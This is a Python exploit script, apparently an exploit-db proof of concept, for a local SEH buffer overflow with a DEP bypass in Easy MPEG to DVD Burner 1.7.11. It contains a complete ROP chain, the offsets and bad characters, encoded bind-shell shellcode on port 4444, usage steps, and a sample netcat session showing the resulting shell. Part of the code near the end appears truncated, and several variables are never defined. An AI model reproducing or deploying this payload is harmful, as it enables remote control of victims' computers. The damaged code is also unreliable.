#!/usr/bin/python #------------------------------------------------------------------------------------------------------------------------------------# # Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow # # Date: 2018-05-19 # # Author: Juan Prescotto # # Tested Against: Win7 Pro SP1 64 bit # # Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html # # Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe # # Version: 1.7.11 # # Special Thanks to my wife for allowing me spend countless hours on this passion of mine # # Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit # # Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script # #------------------------------------------------------------------------------------------------------------------------------------# # Bad Characers: \x00\x0a\x0d # # SEH Offset: 1012 # # Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe # #------------------------------------------------------------------------------------------------------------------------------------# # root@kali:~/Desktop# nc -nv 10.0.1.14 4444 # # (UNKNOWN) [10.0.1.14] 4444 (?) open # # Microsoft Windows [Version 6.1.7601] # # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # # # # C:\Program Files (x86)\Easy MPEG to DVD Burner> # #------------------------------------------------------------------------------------------------------------------------------------# # My register setup when VirtualAlloc() is called (Defeat DEP) : #-------------------------------------------- # EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return) # ECX = flProtect (0x40) # EDX = flAllocationType (0x1000) # EBX = dwSize (0x01) # ESP = lpAddress (automatic) # EBP = ReturnTo (stack pivot into a rop nop / jmp esp) # ESI = ptr to VirtualAlloc() # EDI = ROP NOP (RETN) import struct def create_rop_chain(): rop_gadgets = [ #***START VirtualAlloc() to ESI*** 0x10027e6b, # POP EAX # RETN [SkinMagic.dll] ** 0x1003b1d4, # ptr to &VirtualAlloc() [IAT SkinMagic.dll] 0x100369a1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll] 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xffffffff, # 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bc0, # POP EDX # RETN [SkinMagic.dll] 0xffffffff, # 0x10035a07, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll] 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa141dffb, # 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x41414141, # FILLER 0x1003993e, # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER #***END VirtualAlloc() to ESI*** #***START 0x40 to ECX*** 0x100185fb, # XOR EAX,EAX # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x10037c5b, # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x10032176, # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll] #***END 0x40 to ECX*** #***START 0x1000 to EDX*** 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xaaaaaaaa, # 0x10037bc0, # POP EDX # RETN [SkinMagic.dll] 0x55556556, # 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa141dffb, # 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x41414141, # FILLER #***END 0x1000 to EDX*** #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)*** 0x1002829d, # POP EBP # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x100284f8, # {pivot 16 / 0x10} : # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll] #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)*** #***START 0x1 to EBX*** 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xffffffff, # 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] #***END 0x1 to EBX*** #***START ROP NOP to EDI*** 0x100342f0, # POP EDI # RETN [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] #***END ROP NOP to EDI*** #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()*** 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa140acd2, # CONSTANT 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe] #***END Gadgets to execute PUSHAD*** #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode*** 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 0x1001cc57, # & push esp # ret [SkinMagic.dll] ] return ''.join(struct.pack(' rop_chain) : # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe] nop = "\x90" * 20 #Max Space Avaliable for Shellcode = 600 bytes #------------------------------------------------------------------------------------# # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode # # x86/shikata_ga_nai succeeded with size 355 (iteration=0) # #------------------------------------------------------------------------------------# shellcode = "" shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b" shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93" shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea" shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5" shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44" shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5" shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77" shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1" shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83" shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb" shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88" shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1" shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e" shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86" shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66" shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49" shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c" shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a" shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7" shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9" shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9" shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a" shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9" shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92" shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a" shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60" shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33" shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27" shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55" shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4" exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh f = open ("Exploit.txt", "w") f.write(exploit) f.close()